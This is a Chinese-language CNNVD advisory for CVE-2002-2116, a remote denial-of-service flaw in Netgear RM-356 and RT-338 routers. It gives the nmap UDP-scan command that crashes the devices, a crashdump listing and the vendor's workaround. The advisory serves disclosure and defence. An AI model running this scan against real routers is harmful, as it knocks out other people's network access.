Netgear SOHO Router UDP端口扫描拒绝服务漏洞

漏洞信息详情

Netgear SOHO Router UDP端口扫描拒绝服务漏洞

• CNNVD编号：CNNVD-200212-809
• 危害等级： 中危
  
  
• CVE编号：
  CVE-2002-2116
  
• 漏洞类型：
  
  
  设计错误
  
• 发布时间：
  
  2002-02-15
  
• 威胁类型：
  
  
  远程
  
• 更新时间：
  
  2006-01-25
  
• 厂        商：
  
  netgear
• 漏洞来源：
  Ben Ryan※ ben@bssc…

RM-356是Netgear开发的硬件路由器，适用于家庭或小型办公网络。
UDP扫描会导致RM-356、RT-338崩溃。需要冷启动才可恢复正常。
＃ nmap -sU 210.9.238.103 -T5
此时RM-356的主控台发生crashdump，信息如下
Menu 24.2.1 – System Maintenance – Information
Name： *******_netgear
Routing： IP
RAS F/W Version： V2.21(I.03) | 3/30/2000
MODEM 1 F/W Version： V2.210-V90_2M_DLS
Country Code： 244
LAN
Ethernet Address： 00：a0：c5：e3：**：**
IP Address： 192.168.0.1
IP Mask： 255.255.255.0
DHCP： Server
CRASHDUMP：：
54f7a0： 00 54 f7 a8 00 21 e9 38 00 54 f8 10 00 21 e9 38 .T…!.8.T…!.8
54f7b0： 00 00 00 07 00 41 37 bc 00 2b 09 ca 00 00 00 00 …..A7..+……
54f7c0： 00 55 24 4c 00 2b 09 b2 00 00 00 00 00 55 24 4c .U$L.+…….U$L
54f7d0： 00 00 00 05 00 00 00 00 00 21 16 24 00 57 26 04 ………!.$.W＆.
54f7e0： 00 58 5e e8 00 21 16 24 00 00 26 04 00 21 16 24 .X^..!.$..＆..!.$
54f7f0： 00 41 20 00 00 54 f8 10 00 21 ea 34 00 41 20 00 .A ..T…!.4.A .
54f800： 00 00 00 07 ff ff ff ff 00 54 f8 10 00 21 e6 6e ………T…!.n
54f810： 00 54 f8 2c 00 21 e6 6e 00 41 37 bc ff ff ff ff .T.，.!.n.A7…..
54f820： ff ff 20 04 00 5e 2e 60 00 40 f7 20 00 54 f8 68 .. ..^.`.@. .T.h
54f830： 00 21 b0 00 00 00 00 01 00 2b 09 ca ff ff ff ff .!…….+……
54f840： 00 00 00 07 00 2b 09 b2 00 5e 2e 60 00 00 00 00 …..+…^.`….
54f850： ff ff ff ff 00 00 00 00 00 00 00 00 00 54 f9 9c ………….T..
54f860： 00 5e 2e 60 00 00 00 00 00 54 f8 a8 00 21 a8 1a .^.`…..T…!..
54f870： 00 00 00 07 ff ff ff ff 00 5e 2e 60 00 00 00 00 ………^.`….
54f880： 00 00 00 08 00 00 00 00 00 00 00 21 00 00 00 24 ………..!…$
54f890： 00 00 00 00 00 54 f9 9c 00 5f ec d0 00 55 24 4c …..T…_…U$L
54f8a0： 00 55 24 4c 00 5e 2e 60 00 54 f8 fc 00 23 b8 42 .U$L.^.`.T…＃.B
Boot Module Version ： 4.40. Built at Wed Feb 23 14：00：29 2000
但是TCP connect()扫描正常。
值得注意的是，即使SNMP 161/UDP并未开放，上述扫描同样会导致崩溃。问题可能位
于过滤代码中。绝大多数SOHO Netgear设备有简单的过滤机制。

临时解决方法：
如果您不能立刻安装补丁或者升级，CNNVD建议您采取以下措施以降低威胁：

* 厂商建议telnet到该设备，在Menu 15中将Default地址从0.0.0.0修改成一个局域网内不存在的IP地址，比如192.168.0.99，这样端口扫描将被转发到一个”黑洞”中。厂商并不打算发布新的firmware修正该问题。
厂商补丁：
Netgear
——-
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.netgear.com/” target=”_blank”>
http://www.netgear.com/

来源: BID
名称: 4111
链接:http://www.securityfocus.com/bid/4111

来源: XF
名称: netgear-udp-portscan-dos(8206)
链接:http://www.iss.net/security_center/static/8206.php

来源: BUGTRAQ
名称: 20020215 Re: Remote DoS in Netgear RM-356
链接:http://archives.neohapsis.com/archives/bugtraq/2002-02/0183.html

来源: BUGTRAQ
名称: 20020215 Remote DoS in Netgear RM-356
链接:http://archives.neohapsis.com/archives/bugtraq/2002-02/0162.html

来源：NSFOCUS
名称：2332
链接：http://www.nsfocus.net/vulndb/2332